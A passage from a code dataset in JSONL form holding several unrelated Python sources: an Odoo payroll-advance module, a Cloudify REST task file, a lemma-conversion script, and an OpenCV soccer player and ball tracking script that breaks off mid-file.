specific)\t9\r\n#%y\tYear without century as a zero-padded decimal number.\t13\r\n#%Y\tYear with century as a decimal number.\t2013\r\n#%H\tHour (24-hour clock) as a zero-padded decimal number.\t07\r\n#%-H\tHour (24-hour clock) as a decimal number. (Platform specific)\t7\r\n#%I\tHour (12-hour clock) as a zero-padded decimal number.\t07\r\n#%-I\tHour (12-hour clock) as a decimal number. (Platform specific)\t7\r\n#%p\tLocale’s equivalent of either AM or PM.\tAM\r\n#%M\tMinute as a zero-padded decimal number.\t06\r\n#%-M\tMinute as a decimal number. (Platform specific)\t6\r\n#%S\tSecond as a zero-padded decimal number.\t05\r\n#%-S\tSecond as a decimal number. (Platform specific)\t5\r\n#%f\tMicrosecond as a decimal number, zero-padded on the left.\t000000\r\n#%z\tUTC offset in the form +HHMM or -HHMM (empty string if the the object is naive).\t\r\n#%Z\tTime zone name (empty string if the object is naive).\t\r\n#%j\tDay of the year as a zero-padded decimal number.\t273\r\n#%-j\tDay of the year as a decimal number. (Platform specific)\t273\r\n#%U\tWeek number of the year (Sunday as the first day of the week) as a zero padded decimal number. All days in a new year preceding the first Sunday are considered to be in week 0.\t39\r\n#%W\tWeek number of the year (Monday as the first day of the week) as a decimal number. All days in a new year preceding the first Monday are considered to be in week 0.\t39\r\n#%c\tLocale’s appropriate date and time representation.\tMon Sep 30 07:06:05 2013\r\n#%x\tLocale’s appropriate date representation.\t09/30/13\r\n#%X\tLocale’s appropriate time representation.\t07:06:05\r\n#%%\tA literal '%' character.\t%","sub_path":"script/Step 6. Resample by Year-Month-Hour-User.py","file_name":"Step 6. Resample by Year-Month-Hour-User.py","file_ext":"py","file_size_in_byte":10531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"309596829","text":"# -*- coding: utf-8 -*-\n# Copyright 2018 Elitumdevelop S.A, Ing. Mario Rangel\n# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl.html).\n\nfrom odoo import api, fields, models\nfrom odoo.exceptions import UserError\nfrom datetime import datetime\nfrom odoo.exceptions import ValidationError\n\n\nclass LinesAdvancePayment(models.Model):\n _name = 'eliterp.lines.advance.payment'\n\n _rec_name = \"employee_id\"\n\n _description = 'Líneas de anticipo de quincena'\n\n @api.multi\n def unlink(self):\n \"\"\"\n No eliminamos líneas contabilizadas\n :return:\n \"\"\"\n for line in self:\n if line.parent_state == 'posted':\n raise UserError(\"No podemos borrar líneas de anticipo contabilizadas.\")\n return super(LinesAdvancePayment, self).unlink()\n\n @api.depends('advanced_id.state')\n def _compute_parent_state(self):\n \"\"\"\n Obtenemos el estado del padre\n \"\"\"\n for record in self.filtered('advanced_id'):\n record.parent_state = record.advanced_id.state\n\n @api.one\n @api.depends('amount_advance', 'mobilization')\n def _get_total(self):\n \"\"\"\n Total de línea\n \"\"\"\n self.amount_total = round(self.amount_advance + self.mobilization, 2)\n\n employee_id = fields.Many2one('hr.employee', string='Empleado')\n job_id = fields.Many2one('hr.job', string='Cargo de trabajo', related='employee_id.job_id', store=True)\n admission_date = fields.Date(related='employee_id.admission_date', store=True, string='Fecha ingreso')\n amount_advance = fields.Float('Monto', default=0.00)\n mobilization = fields.Float(string='Movilización')\n antiquity = fields.Integer('Días')\n amount_total = fields.Float('Total', compute='_get_total', store=True)\n advanced_id = fields.Many2one('eliterp.advance.payment', 'Anticipo', ondelete=\"cascade\")\n parent_state = fields.Char(compute=\"_compute_parent_state\", string=\"Estado de anticipo\")\n\n\nclass ReasonDenyAdvance(models.TransientModel):\n _name = 'eliterp.reason.deny.advance'\n\n _description = 'Razón para negar anticipo de quincena'\n\n description = fields.Text('Descripción', required=True)\n\n @api.multi\n def deny_advance(self):\n \"\"\"\n Cancelamos el anticipo de quincena\n \"\"\"\n advance_id = self.env['eliterp.advance.payment'].browse(self._context['active_id'])\n advance_id.update({\n 'state': 'deny',\n 'reason_deny': self.description\n })\n return advance_id\n\n\nclass AdvancePayment(models.Model):\n _name = 'eliterp.advance.payment'\n _inherit = ['mail.thread']\n\n _description = 'Anticipo de quincena'\n\n @api.multi\n def print_advance(self):\n \"\"\"\n Imprimimos anticipo\n \"\"\"\n self.ensure_one()\n return self.env.ref('eliterp_hr.eliterp_action_report_advance_payment').report_action(self)\n\n @api.multi\n def button_cancel(self):\n self.write({'state': 'cancel'})\n\n def _get_antiquity(self, employee):\n \"\"\"\n Obtener días de antiguedad con fecha de documento\n :param employee:\n :return: integer\n \"\"\"\n start_date = datetime.strptime(employee.admission_date, '%Y-%m-%d')\n end_date = datetime.strptime(self.date, '%Y-%m-%d')\n time = (str(end_date - start_date)).strip(', 0:00:00')\n days = 0\n if time:\n days = int(\"\".join([x for x in time if x.isdigit()]))\n return days\n\n def load_employees(self):\n \"\"\"\n Cargamos empleados para total de anticipo, debe tener un contrato el empleado\n \"\"\"\n if self.lines_advance:\n self.lines_advance.unlink() # Borramos líneas anteriores, no montar\n list_employees = []\n for employee in self.env['hr.employee'].search([\n ('active', '=', True),\n ('contract_id', '!=', False),\n ('project_id', '=', self.project_id.id)\n ]):\n amount_advance = 0.0 # Para MAEQ se trabajará así por el momento la variable está configurada en Ajustes\n # RRHH\n antiquity = self._get_antiquity(employee)\n if antiquity >= self.advance_days:\n amount_advance = round(float((employee.wage * 40) / 100), 2)\n else:\n amount_advance = 80.0\n list_employees.append([0, 0, {\n 'employee_id': employee.id,\n 'antiquity': antiquity,\n 'mobilization': round(employee.mobilization / 2, 2),\n 'amount_advance': amount_advance,\n }])\n return self.write({'lines_advance': list_employees})\n\n @api.one\n @api.depends('lines_advance')\n def _get_total(self):\n \"\"\"\n Total de líneas de anticipo\n \"\"\"\n self.total = sum(line.amount_total for line in self.lines_advance)\n\n @api.multi\n def to_approve(self):\n \"\"\"\n Solicitar aprobación de anticipo de quincena\n \"\"\"\n if not self.lines_advance:\n raise UserError(\"No hay líneas de anticipo creadas.\")\n self.update({'state': 'to_approve'})\n # Enviar correo a usuarios para aprobación\n self.env['eliterp.managerial.helps'].send_mail(self.id, self._name, 'eliterp_approve_advance_mail')\n\n @api.multi\n def reviewed(self):\n \"\"\"\n Revisado\n \"\"\"\n self.update({'state': 'reviewed', 'reviewed_user': self._uid})\n\n @api.multi\n def approve(self):\n \"\"\"\n Aprobar anticipo de quincena\n \"\"\"\n self.update({'state': 'approve', 'approval_user': self._uid})\n\n @api.multi\n def open_reason_deny_advance(self):\n \"\"\"\n Abrir ventana emergente para cancelar anticipo\n :return: dict\n \"\"\"\n return {\n 'name': \"Explique la razón\",\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_model': 'eliterp.reason.deny.advance',\n 'type': 'ir.actions.act_window',\n 'target': 'new',\n }\n\n @api.multi\n def posted_advance(self):\n \"\"\"\n Contabilizar anticipo\n \"\"\"\n ref = \"Anticipo de \" + self.period\n move_id = self.env['account.move'].create({\n 'journal_id': self.journal_id.id,\n 'date': self.date,\n 'ref': ref\n })\n account_debit = self.journal_id.default_debit_account_id.id\n account_credit = self.journal_id.default_credit_account_id.id\n if not account_credit or not account_debit:\n raise UserError('No existe cuenta acredora y/o deudora en diario.')\n self.env['account.move.line'].with_context(check_move_validity=False).create({\n 'name': ref,\n 'journal_id': self.journal_id.id,\n 'account_id': account_credit,\n 'move_id': move_id.id,\n 'project_id': self.project_id.id,\n 'debit': 0.0,\n 'credit': self.total,\n 'date': self.date\n })\n self.env['account.move.line'].with_context(check_move_validity=True).create({\n 'name': ref,\n 'journal_id': self.journal_id.id,\n 'account_id': account_debit,\n 'move_id': move_id.id,\n 'project_id': self.project_id.id,\n 'debit': self.total,\n 'credit': 0.0,\n 'date': self.date\n })\n move_id.post()\n return self.write({\n 'name': move_id.name,\n 'state': 'posted',\n 'move_id': move_id.id\n })\n\n @api.one\n @api.depends('date')\n def _get_period(self):\n \"\"\"\n Obtenemos el período con la fecha de emisión\n \"\"\"\n month = self.env['eliterp.global.functions']._get_month_name(int(self.date[5:7]))\n self.period = \"%s [%s]\" % (month, self.date[:4])\n\n @api.depends('lines_advance')\n def _get_count_lines(self):\n \"\"\"\n Cantidad de líneas de anticipo\n \"\"\"\n for record in self:\n record.count_lines = len(record.lines_advance)\n\n @api.multi\n def unlink(self):\n \"\"\"\n No eliminamos roles diferentes de borrador\n :return:\n \"\"\"\n for line in self:\n if line.state != 'draft':\n raise ValidationError(\"No podemos borrar anticipos diferentes de borrador.\")\n return super(AdvancePayment, self).unlink()\n\n name = fields.Char('No. Documento', index=True, default='Nuevo')\n period = fields.Char('Período', compute='_get_period', store=True)\n date = fields.Date('Fecha de emisión', default=fields.Date.context_today, required=True,\n readonly=True, states={'draft': [('readonly', False)]})\n lines_advance = fields.One2many('eliterp.lines.advance.payment', 'advanced_id', string='Líneas de anticipo')\n move_id = fields.Many2one('account.move', string='Asiento contable')\n total = fields.Float('Total de anticipo', compute='_get_total', store=True, track_visibility='onchange')\n journal_id = fields.Many2one('account.journal', string=\"Diario de anticipo\",\n default=lambda self: self.env.ref(\"eliterp_hr.eliterp_journal_advance_payment\").id)\n state = fields.Selection([\n ('draft', 'Borrador'),\n ('to_approve', 'Por aprobar'),\n ('reviewed', 'Revisado'),\n ('approve', 'Aprobado'),\n ('posted', 'Contabilizado'),\n ('deny', 'Negado'),\n ('cancel', 'Anulado')], string=\"Estado\", default='draft', track_visibility='onchange')\n approval_user = fields.Many2one('res.users', string='Aprobado por', copy=False)\n reviewed_user = fields.Many2one('res.users', string='Revisado por')\n reason_deny = fields.Text('Negado por')\n count_lines = fields.Integer('Nº empleados', compute='_get_count_lines')\n comment = fields.Text('Notas y comentarios', readonly=True, states={'draft': [('readonly', False)]})\n # Dato parametrizado para MAEQ (Pago de ADQ según días de empleados)\n advance_days = fields.Integer('Días de ADQ')\n","sub_path":"eliterp_hr/models/advance_payment.py","file_name":"advance_payment.py","file_ext":"py","file_size_in_byte":10033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"222616826","text":"########\n# Copyright (c) 2014-2018 Cloudify Platform Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport traceback\nfrom cloudify import ctx\nfrom cloudify.exceptions import NonRecoverableError, RecoverableError\nfrom rest_sdk import utility, exceptions\n\n\ndef execute(params=None, template_file=None, **kwargs):\n\n params = params or {}\n template_file = template_file or ''\n\n ctx.logger.debug(\n 'execute \\n params {} \\n template \\n {}'.format(params, template_file))\n runtime_properties = ctx.instance.runtime_properties.copy()\n if not params:\n params = {}\n runtime_properties.update(params)\n _execute(runtime_properties, template_file, ctx.instance, ctx.node)\n\n\ndef execute_as_relationship(params, template_file, **kwargs):\n ctx.logger.debug(\n 'execute_as_relationship \\n '\n 'params {} \\n template {}\\n'.format(params, template_file))\n if not params:\n params = {}\n runtime_properties = ctx.target.instance.runtime_properties.copy()\n runtime_properties.update(ctx.source.instance.runtime_properties)\n runtime_properties.update(params)\n _execute(runtime_properties, template_file, ctx.source.instance,\n ctx.source.node)\n\n\ndef _execute(params, template_file, instance, node):\n if not template_file:\n ctx.logger.info(\n 'Processing finished. No template file provided.')\n return\n template = ctx.get_resource(template_file)\n try:\n instance.runtime_properties.update(\n utility.process(params, template, node.properties.copy()))\n except exceptions.NonRecoverableResponseException as e:\n raise NonRecoverableError(e)\n\n except (exceptions.RecoverableResponseException,\n exceptions.RecoverableStatusCodeCodeException,\n exceptions.ExpectationException)as e:\n raise RecoverableError(e)\n except Exception as e:\n ctx.logger.info(\n 'Exception traceback : {}'.format(traceback.format_exc()))\n raise NonRecoverableError(e)\n","sub_path":"cloudify_rest/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"35987131","text":"from ast import literal_eval\r\nfrom collections import Counter, defaultdict\r\n\r\nold_file = '../../data/MLSA/lemmas_tagged.txt'\r\nnew_file = '../../data/MLSA/test_data.txt'\r\n\r\ndata = defaultdict(Counter)\r\n\r\nwith open(old_file, 'r', encoding='utf8') as f_in:\r\n for line in f_in:\r\n lemma, string = line.strip().split(' ', 1)\r\n answers = literal_eval(string)\r\n data[lemma].update(answers)\r\n\r\nwith open(new_file, 'w', encoding='utf8') as f_out:\r\n for lemma, answers in sorted(data.items()):\r\n if lemma[-1] == 'A': # Convert from 'A' to 'AJ'\r\n lemma += 'J'\r\n ans_str = ''\r\n for pol, n in answers.items():\r\n if not pol:\r\n pol = '0'\r\n ans_str += pol * n\r\n f_out.write('{}\\t{}\\n'.format(lemma, ans_str))","sub_path":"src/eval/layer23rewrite.py","file_name":"layer23rewrite.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"637338603","text":"from __future__ import print_function # print_function 이라는 모듈에서 future만 뽑아서 사용 # python 2에서 python3의 문법을 사용하기 위해\r\nimport numpy as np # np numarray 이미지 파일을 배열형식으로 뽑아낼때 사용 \r\nimport cv2 # 오픈cv 열기\r\nimport os # 운영체제 기능을 파이썬에서 사용 ex 파일입출력\r\nimport sys # 환경변수같은 인수를 입력받는 모듈\r\nimport random # 난수 생성할때 사용하는 모듈\r\nimport imutils # image utils 이미지 관련된 유틸리티 - opencv와 관련된 라이브러리\r\n# import pycuda\r\nimport math\r\nimport collections\r\nimport heatmap\r\nfrom datetime import datetime\r\nfrom PIL import ImageFont, ImageDraw, Image\r\nfrom moviepy.editor import * # moviepy 라이브러리 :\r\nfrom moviepy.video.io.ffmpeg_tools import ffmpeg_extract_subclip # 하이라이트 영상 추출을 위해 구간 자르는 라이브러리 \r\n\r\n# 히트맵에 각기 다른 색상을 표현하기 위한 튜플로 된 리스트 12개를 정의\r\ncolors12 = [(0,0,0),(255,255,255),(255,0,0),(0,255,0),(0,0,255),(255,255,0),(0,255,255),(255,0,255),(192,192,192),(244,164,96),(128,128,0),(240, 50, 230)]\r\n\r\n# 각 팀 선수들이 전체 경기 중 공을 점유한 프레임 수 \r\nball_share_A = [] \r\nball_share_B = []\r\n\r\n# 팀 단위로 경기 동안 공을 점유한 프레임 수 \r\nsum_ball_A = 0\r\nsum_ball_B = 0\r\n\r\n\r\ndef selectMultiROI(player_cnt, team_cnt, team) :\r\n global p, bboxes, colors\r\n\r\n while True:\r\n \r\n print('Select the Player')\r\n \r\n cv2.putText(frame, str(team)+' Team ', (50, 30), cv2.FONT_HERSHEY_COMPLEX, 1, (255,255,255), 2, cv2.LINE_AA) \r\n cv2.putText(frame, ' Done: '+str(player_cnt-1)+' / Total: '+str(team_cnt),(45, 60), cv2.FONT_HERSHEY_COMPLEX, 0.5, (255,255,255), 1, cv2.LINE_AA) \r\n #now = datetime.now()\r\n #curTime = now.strftime('%H:%M:%S')\r\n videoLen = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\r\n videoFps = cap.get(cv2.CAP_PROP_FPS)\r\n videoTime = int((videoLen / videoFps)) # 동영상 재생 시간을 초로 반환\r\n \r\n # 분석하는데 남은 에상 소요시간\r\n analTime = videoTime * (team_cnt-player_cnt+1)\r\n if analTime < 60 :\r\n minute = 0\r\n second = analTime\r\n else :\r\n minute = int(analTime / 60) # 분\r\n second = analTime % 60 # 초 \r\n \r\n cv2.putText(frame, ' Processing times: '+str(minute)+'m '+str(second)+'s',(45, 85), cv2.FONT_HERSHEY_COMPLEX, 0.5, (255,255,255), 1, cv2.LINE_AA) \r\n \r\n #finishTime = \r\n #cv2.putText(frame, ' current time: '+str(curTime),(45, 90), cv2.FONT_HERSHEY_COMPLEX, 0.5, (255,0,0), 1, cv2.LINE_AA) #Multitracker_Window\r\n #cv2.putText(frame, ' estimated finish time: '+str(videoTime),(45, 120), cv2.FONT_HERSHEY_COMPLEX, 0.5, (255,0,0), 1, cv2.LINE_AA) #Multitracker_Window\r\n \r\n # 0:0 -> 1:0\r\n\r\n # ?draw bounding boxes over objects\r\n # ?selectROI's default behaviour is to draw box starting from the center\r\n # ?when fromCenter is set to false, you can draw box starting from top left corner\r\n bbox = cv2.selectROI('MultiTracker', frame) #roi 를 선택하는 함수-길\r\n #roi 정보가 bbox 에 저장되어 사용된다-길\r\n #tracker.init(frame123, bbox) # 오브젝트 트래커가 frame123과 bboc를 따라가게끔 설정한다.\r\n bboxes.append(bbox)\r\n if (p<6):\r\n colors.append((0,0,255))\r\n else:\r\n colors.append((255,0,0))\r\n print(\"Press q to quit selecting boxes and start tracking\")\r\n print(\"Press any other key to select next object : \", p)\r\n p=p+1\r\n k = cv2.waitKey(0) & 0xFF\r\n if (k == 113): # q is pressed\r\n break\r\n print('Selected bounding boxes {}'.format(bboxes))\r\n return\r\n\r\ndef readBallCoord() : # ball_coord.txt 파일에서 공 좌표 읽어오는 함수 \r\n y, x, z = np.genfromtxt('ball_coord_TEST.txt', delimiter=',', unpack=True,dtype=int)\r\n return (x,y, z)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n \r\n ######################################################\r\n \r\n A = int(input('Home팀의 인원 입력 : '))\r\n B = int(input('Away팀의 인원 입력 : ')) \r\n \r\n # 6명 vs 6명으로 뛴다고 입력 받았을 경우\r\n total_player = A + B # 경기에 참여하는 플레이어 수가 12명인 경우\r\n flag = A\r\n ######################################################\r\n \r\n \r\n for player in range(1, total_player+1): # 선수 1부터 total_player까지 반복문\r\n \r\n tracker = cv2.TrackerCSRT_create() # CSRT tracker 초기화\r\n #videoPath = 'near_2.mov' # 비디오를 읽어옴\r\n videoPath = 'TEST.mov' # 비디오를 읽어옴\r\n \r\n # Create a video capture object to read videos \r\n cap = cv2.VideoCapture(videoPath) #비디오를 읽는 함수-길\r\n \r\n # Set video to load\r\n success, frame = cap.read()\r\n \r\n fps = cap.get(cv2.CAP_PROP_FPS)\r\n fps = round(fps,0)\r\n\r\n frame = imutils.resize(frame, width=1000) # 리사이징\r\n print(frame.shape)\r\n \r\n \r\n \r\n # backSub = cv2.createBackgroundSubtractorMOG2() # cv에서 제공하는 배경제거를 위한 마스크 초기화\r\n # backSub = cv2.bgsegm.createBackgroundSubtractorGMG() 사람이 흰점이 되지만 꽤 괜찮음\r\n\r\n \r\n heatmap_background = cv2.imread('heatmap2.png') # 히트맵창의 배경 지정\r\n original = cv2.imread('heatmap2.png')\r\n\r\n player_file = open( 'player_coord.txt', 'w' ) # 좌표값을 저장할 파일\r\n \r\n \r\n # 영상 읽기에 실패 예외처리\r\n if not success:\r\n print('Failed to read video')\r\n sys.exit(1)\r\n\r\n ## Select boxes 빈 리스트 선언\r\n bboxes = []\r\n colors = [] \r\n p=0\r\n # OpenCV의 selectROI 함수는 다중 객체 선택을 지원하지 않으므로 반복문을 통해 다중 ROI 지정을 구현\r\n # while True:\r\n \r\n # fgMask = backSub.apply(frame) # frame에 배경제거 mask를 적용시켜 이미지 생성\r\n\r\n # print('Select the Player')\r\n\r\n # # ?draw bounding boxes over objects\r\n # # ?selectROI's default behaviour is to draw box starting from the center\r\n # # ?when fromCenter is set to false, you can draw box starting from top left corner\r\n # bbox = cv2.selectROI('MultiTracker', frame) #roi 를 선택하는 함수-길\r\n # #roi 정보가 bbox 에 저장되어 사용된다-길\r\n # #tracker.init(frame123, bbox) # 오브젝트 트래커가 frame123과 bboc를 따라가게끔 설정한다.\r\n # bboxes.append(bbox)\r\n # if (p<6):\r\n # colors.append((0,0,255))\r\n # else:\r\n # colors.append((255,0,0))\r\n # print(\"Press q to quit selecting boxes and start tracking\")\r\n # print(\"Press any other key to select next object : \", p)\r\n # p=p+1\r\n # k = cv2.waitKey(0) & 0xFF\r\n # if (k == 113): # q is pressed\r\n # break\r\n # print('Selected bounding boxes {}'.format(bboxes))\r\n \r\n \r\n if player <= flag : \r\n team_name = 'Home'\r\n player_num = player\r\n selectMultiROI(player_num, A, team_name);\r\n else :\r\n team_name = 'Away'\r\n player_num = player-flag\r\n selectMultiROI(player_num, B, team_name);\r\n\r\n\r\n\r\n # Create MultiTracker object\r\n multiTracker = cv2.MultiTracker_create()\r\n \r\n #좌표를 표현할 이름있는 튜플\r\n Point = collections.namedtuple('Point',['x','y'])\r\n lastPoint = Point(x=-1, y=-1) # 과거의 좌표값을 저장할 튜플, -1로 초기화\r\n estimate_distance = 0 # 영상기반 추정거리값을 저장\r\n distance = 0 # 거리값을 저장\r\n frame_cnt = 0 # 프레임을 카운팅함\r\n show_goal_frame = 0 # 골인 경우 화면에 fps 프레임수 동안 \"골인입니다\" 표시하기 위해\r\n ball_frame_cnt = 0 # 공을 인식한 프레임을 따로 저장 \r\n pre_frame_cnt =0 # 목적: 공이 인식된 현 프레임과 이전 프레임의 '차'를 계산\r\n ball_touch = 0 # roi로 선택한 선수가 공을 점유한 프레임 수(볼 터치 수)를 카운팅함 \r\n moving_weight = 0 # 움직인 거리의 비중을 저장\r\n top_speed = 0 # 최고 속도를 저장\r\n accumulate_speed = 0 # 속도들의 누적값\r\n temp_distance = 0 # 뛴 거리를 임시저장\r\n temp_speed = 0 # 뛴 속도를 임시저장\r\n interval = 30 # 특정 시간(초)\r\n interval_distance = 0 # 특정 시간마다의 뛴거리\r\n interval_acc_speed = 0 # 특정 시간마다의 속도 누적값\r\n interval_avg_speed = 0 # 특정 시간마다의 평균속도\r\n str_coord = ''\r\n walk_cnt=0\r\n jog_cnt=0\r\n sprint_cnt = 0\r\n highlight_goal_point = 0 # 하이라이트 추출시 골인인 프레임을 중심으로 앞뒤로 6초동안 보여주기\r\n \r\n blue_ROI = False # ROI 색이 파란색으로 바뀐 경우 -> True\r\n red_ROI_cnt = 0 # roi가 파란색에서 빨간색으로 바뀐 경우 빨간색을 유지하는 프레임 수를 카운팅함\r\n is_pass = False # roi 파 -> 빨 바뀌는 경우(1): 패스인 경우 \r\n is_dribble = False # roi 파 -> 빨 바뀌는 경우(2): 선수가 드리블하는 중인 경우 \r\n pass_count = 0 # 선수의 패스 횟수 실시간 카운팅\r\n \r\n \r\n coord_head=coord_tail= Point(x=0,y=0)\r\n \r\n ball_x,ball_y,ball_frame_cnt = readBallCoord() # 공의 좌표, 공이 인식된 프레임 읽어오기\r\n\r\n # Initialize MultiTracker \r\n for bbox in bboxes:\r\n multiTracker.add(tracker, frame, bbox)\r\n # multiTracker.add(tracker, fgMask, bbox)\r\n\r\n \r\n ################################################################################################################################################### \r\n ###################################################################영상을 열음#########################################################################\r\n \r\n while cap.isOpened():#비디오가 잘 열렸는지 확인하는 함수-길\r\n success, frame = cap.read()# cap.read() 는 동영상을 1프레임씩 읽어오는 것-길\r\n\r\n if not success:\r\n break\r\n\r\n frame = imutils.resize(frame, width=1000) # 리사이징\r\n \r\n #fgMask = backSub.apply(frame) # 프레임에 마스크를 적용시켜 그레이스케일로 만들어줌\r\n\r\n\r\n # get updated location of objects in subsequent frames\r\n # success, boxes = multiTracker.update(frame) #update() 따라가게 만드는 함수 - 길\r\n success, boxes = multiTracker.update(frame)\r\n \r\n if(frame_cnt==0) : # 코드 속도개선을 위해 중복되는 코드는 한번만 수행되도록함\r\n height,width ,channels = frame.shape #maintain all tabs in same shape\r\n heatmap_background = cv2.resize(heatmap_background,(width,height))\r\n original = cv2.resize(original,(width,height))\r\n radar = original.copy() \r\n \r\n # draw tracked objects\r\n for i, newbox in enumerate(boxes):\r\n \r\n p1 = (int(newbox[0]), int(newbox[1]))\r\n p2 = (int(newbox[0] + newbox[2]), int(newbox[1] + newbox[3]))\r\n \r\n \r\n ################################################### 공 점유율 계산 알고리즘 ########################################################\r\n \r\n # 예외처리 (사람이 경기장 끝으로 갔을 경우 -> out of index error 발생)\r\n player_x1 = p1[0]-10 \r\n player_x2 = p2[0]+10\r\n player_y1= p1[1]-10 \r\n player_y2= p2[1]+10\r\n \r\n if player_x1 < 0 :\r\n player_x1 = 0 \r\n if player_x2 > frame.shape[1] : # 가로 길이를 초과할 경우 \r\n player_x2 = frame.shape[1]\r\n \r\n if player_y1 < 0 :\r\n player_y1 = 0 \r\n if player_y2 > frame.shape[0] : # 세로 길이를 초과할 경우\r\n player_y2 = frame.shape[0]\r\n \r\n \r\n # 공 점유 인식 (공이 선수 roi 박스 안으로 들어올 경우지정해준 선수와 가까이 있을 경우)\r\n # roi 파란색\r\n if( player_x1 fps : # 일정 시간 이상동안 roi가 빨간색이라면 '선수의 드리블'이 아니라 '패스'임\r\n pass_count += 1 # 선수에게 공을 뺏기거나(패스실패) 패스 성공해서 공 점유 끝남\r\n red_ROI_cnt = 0 \r\n blue_ROI = False \r\n \r\n ##################################################################\r\n \r\n ########################################################################################################\r\n \r\n if(ball_x[frame_cnt] > -1):\r\n \r\n ###################################################골 인식 알고리즘 ############################################################# \r\n \r\n # 공이 슬로우모션으로 쫓아가는 현상 해결(현재 프레임과 공이 인식된 프레임 번호가 같을 경우만 화면에 공 출력)\r\n if ball_frame_cnt[frame_cnt] == frame_cnt :\r\n \r\n # Home팀의 '골 에어리어'에 공이 진입한 경우 초록색으로 표시 (가로 1000일 경우: 100이하, 900이상)\r\n if ball_x[frame_cnt] >= width * 0.9 : \r\n \r\n isInGoalNet = False \r\n invisible = frame_cnt - pre_frame_cnt\r\n \r\n if invisible > fps :# '골 에어리어' 영역에서 영상의 '프레임률(fps)' 이상 보이지 않는다면 공은 골 안에 있음 \r\n isInGoalNet = True\r\n \r\n # '골'인 경우 노란색으로 표시\r\n if isInGoalNet == True : #if ball_x == 947 and ball_y ==289 :\r\n print('Home팀 골인입니다!!!!!', frame_cnt)\r\n print('invisible term: ', invisible)\r\n #cv2.waitKey(0) # 화면 정지하고 키 입력을 기다리도록 \r\n \r\n cv2.putText(frame, 'Home team Goal!! ',(250, 276), cv2.FONT_HERSHEY_COMPLEX, 1.5, (0,0,255), 2, cv2.LINE_AA)\r\n show_goal_frame = 1\r\n highlight_goal_point = frame_cnt # 골인을 인식한 프레임을 하이라이트 기준으로 삼음 \r\n \r\n \r\n cv2.circle(frame, (ball_x[frame_cnt], ball_y[frame_cnt]), 5, (0, 228, 255), 2) # 노란색으로 표시\r\n pre_frame_cnt = frame_cnt\r\n \r\n \r\n\r\n else :\r\n print(\"Home팀 골에어리어에 공이 진입했습니다.\", frame_cnt) \r\n cv2.circle(frame, (ball_x[frame_cnt], ball_y[frame_cnt]), 5, (22, 219, 29), 2) # 초록색으로 표시\r\n pre_frame_cnt = frame_cnt\r\n \r\n # Away팀의 '골 에어리어'에 공이 진입한 경우 초록색으로 표시 (가로 1000일 경우: 100이하, 900이상)\r\n elif ball_x[frame_cnt] <= width * 0.1 : \r\n \r\n isInGoalNet = False \r\n invisible = frame_cnt - pre_frame_cnt\r\n \r\n \r\n if invisible > fps :# '골 에어리어' 영역에서 영상의 '프레임률(fps)' 이상 보이지 않는다면 공은 골 안에 있음 \r\n isInGoalNet = True\r\n \r\n # '골'인 경우 노란색으로 표시\r\n if isInGoalNet == True : #if ball_x == 947 and ball_y ==289 :\r\n print('Away팀 골인입니다!!!!!', frame_cnt)\r\n print('invisible term: ', invisible)\r\n \r\n cv2.circle(frame, (ball_x[frame_cnt], ball_y[frame_cnt]), 5, (0, 228, 255), 2) # 노란색으로 표시\r\n pre_frame_cnt = frame_cnt\r\n highlight_goal_point = frame_cnt # 골인을 인식한 프레임을 하이라이트 기준으로 삼음\r\n \r\n \r\n else :\r\n print(\"Away팀 골에어리어에 공이 진입했습니다.\", frame_cnt)\r\n cv2.circle(frame, (ball_x[frame_cnt], ball_y[frame_cnt]), 5, (22, 219, 29), 2) # 초록색으로 표시\r\n pre_frame_cnt = frame_cnt\r\n \r\n \r\n # 골에어리어에 공이 진입하지도 않았고, '골'도 아닌 경우\r\n else : \r\n \r\n cv2.circle(frame, (ball_x[frame_cnt], ball_y[frame_cnt]), 5, (0, 0, 255), 2)\r\n pre_frame_cnt = frame_cnt\r\n\r\n # rectangle(): 직사각형을 그리는 함수-길\r\n #파라미터 (이미지, 왼쪽 위 좌표, 오른쪽 아래 좌표, 사각형 색깔, 사각형의 두께, ?? ) -길\r\n \r\n ################################################################################################################################################\r\n\r\n cv2.putText(frame, team_name+' '+str(player_num), (int(newbox[0])-27, int(newbox[1])-5), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0,0,255), 1, cv2.LINE_AA) #Multitracker_Window\r\n\r\n cv2.circle(radar,(int(newbox[0]), int(newbox[1])), 10, (0,0,255), -1)\r\n \r\n \r\n if(ball_x[frame_cnt] > -1):\r\n cv2.circle(radar, (ball_x[frame_cnt], ball_y[frame_cnt]), 7, (0, 0, 0), -1)\r\n #Radar_Window\r\n\r\n overlay=heatmap_background.copy()\r\n alpha = 0.5 # Transparency factor.\r\n # cv2.circle(overlay,(int(newbox[0]), int(newbox[1])), 3, colors12[i], -1) #Heatmap_Window\r\n # Following line overlays transparent rectangle over the imagex\r\n # heatmap_background = cv2.addWeighted(overlay, alpha, heatmap_background, 1 - alpha, 0) #Heatmap_Window\r\n \r\n # 거리와 속도 추정치를 계산하기 위한 코드들\r\n if(frame_cnt==0) :\r\n lastPoint = Point(x = int(newbox[0]), y = int(newbox[1])) # 첫 프레임에서는 과거 좌표를 현재좌표와 동일하게 초기화함\r\n coord_head = coord_tail = Point(x = int(newbox[0]), y = int(newbox[1])) # 히트맵을 위한 좌표값들 초기화\r\n \r\n if((frame_cnt%fps)==0) : # 프레임기반 1초(fps)마다 동작하는 코드\r\n # 초당 프레임간 발생한 거리차이를 a, b에 